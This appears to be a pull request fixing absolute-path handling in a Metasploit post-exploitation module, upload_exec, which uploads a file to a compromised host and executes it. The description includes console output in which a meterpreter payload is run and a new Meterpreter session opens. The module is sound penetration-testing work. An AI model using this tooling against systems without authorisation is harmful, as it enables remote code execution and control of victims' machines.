### PR TITLE
Fix upload_exec for absolute paths

### DIFF
--- a/modules/post/multi/manage/upload_exec.rb
+++ b/modules/post/multi/manage/upload_exec.rb
@@ -18,34 +18,43 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptPath.new('LFILE', [true,'Local file to upload and execute']),
-        OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']),
+        OptPath.new('LPATH', [true,'Local file path to upload and execute']),
+        OptString.new('RPATH', [false,'Remote file path on target (default is basename of LPATH)']),
       ])
   end
 
-  def rfile
-    if datastore['RFILE'].blank?
-      remote_name = File.basename(datastore['LFILE'])
+  def rpath
+    if datastore['RPATH'].blank?
+      remote_name = File.basename(datastore['LPATH'])
     else
-      remote_name = datastore['RFILE']
+      remote_name = datastore['RPATH']
     end
 
     remote_name
   end
 
-  def lfile
-    datastore['LFILE']
+  def lpath
+    datastore['LPATH']
   end
 
   def run
-    upload_file(rfile, lfile)
+    upload_file(rpath, lpath)
 
     if session.platform.include?("windows")
-      cmd_exec("cmd.exe /c start #{rfile}", nil, 0)
+      cmd_exec("cmd.exe /c start #{rpath}", nil, 0)
     else
-      cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0)
+      cmd = "chmod 700 #{rpath} && "
+
+      # Handle absolute paths
+      if rpath.start_with?('/')
+        cmd << rpath
+      else
+        cmd << "./#{rpath}"
+      end
+
+      cmd_exec(cmd, nil, 0)
     end
-    rm_f(rfile)
+
+    rm_f(rpath)
   end
 end
-


### PR DESCRIPTION
```
msf5 post(multi/manage/upload_exec) > options

Module options (post/multi/manage/upload_exec):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   LPATH    meterpreter       yes       Local file path to upload and execute
   RPATH    /tmp/meterpreter  no        Remote file path on target (default is basename of LPATH)
   SESSION  -1                yes       The session to run this module on.

msf5 post(multi/manage/upload_exec) > run

[!] SESSION may not be compatible with this module.
[*] Max line length is 65537
[*] Writing 249 bytes in 1 chunks of 727 bytes (octal-encoded), using printf
[*] Sending stage (816260 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:36460) at 2018-07-26 20:07:44 -0500
[*] Post module execution completed
msf5 post(multi/manage/upload_exec) >
```

Fixes #10337.